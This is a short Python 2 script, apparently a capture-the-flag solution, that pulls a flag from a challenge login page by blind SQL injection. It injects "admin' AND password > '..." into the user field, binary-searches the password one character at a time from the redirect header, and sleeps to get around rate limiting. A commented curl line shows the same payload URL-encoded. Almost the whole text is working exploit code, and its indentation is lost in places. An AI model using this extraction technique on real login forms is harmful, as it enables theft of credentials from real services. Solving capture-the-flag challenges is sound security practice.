import requests, string, random, time#curl 'http://qu0t453gelwwjl3vxzltjxwww

1. import requests, string, random, time
2.  
3. #curl 'http://qu0t453gelwwjl3vxzltjxwww-abuse.web.ctfcompetition.com/login'
4. #--data 'password=CTF%7Bqu0t45aaaaaaaaaaaaaaaawww-aaaaaaaaaaaaaaaaaaaaaaaa
5. # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%7D&user=admin%27%20AND%20password%3e%20%27AAA' -v
6.  
7. a=random.choice(string.lowercase)
8. a+=random.choice(string.lowercase)
9. a+=random.choice(string.lowercase)
10. prefix = "qu0t453g3w"+a+"reaxoltjxwww-"
11. print prefix
12. def isbigger(p):
13. while True:
14. try:
15. print p
16. r=requests.post("http://"+prefix+"abuse.web.ctfcompetition.com/login",
17. data={"password": "xx", "user":
18. "admin' AND password > '" + p},
19. allow_redirects=False, headers={})
20. l=r.headers["Location"]
21. print l
22. return "password" in l
23. except:
24. print "Throttle", time.time()
25. time.sleep(10)
26. return None
27.  
28. window = 32
29. hits = []
30. errs = []
31.  
32. s="CTF{"+prefix
33. while True:
34. charset=sorted(string.letters+string.digits+"_-")
35. l=0
36. r=len(charset)
37.  
38. while l+1!=r:
39. while len(hits)>=13 or len(errs)>=2:
40. time.sleep(0.1)
41. hits = [hit for hit in hits if hit>time.time()-window]
42. errs = [err for err in errs if err>time.time()-window]
43. print len(hits), len(errs)
44. m=l+(r-l)*90/100
45. if m<=l:
46. m=l+1
47. elif m>=r:
48. m=r-1
49. c=charset[m]
50. ss=s+c+" "*20
51. q=isbigger(ss)
52. if q is None:
53. continue
54. hits.append(time.time())
55. if q:
56. errs.append(time.time())
57. l=m
58. else:
59. r=m
60. s+=charset[l]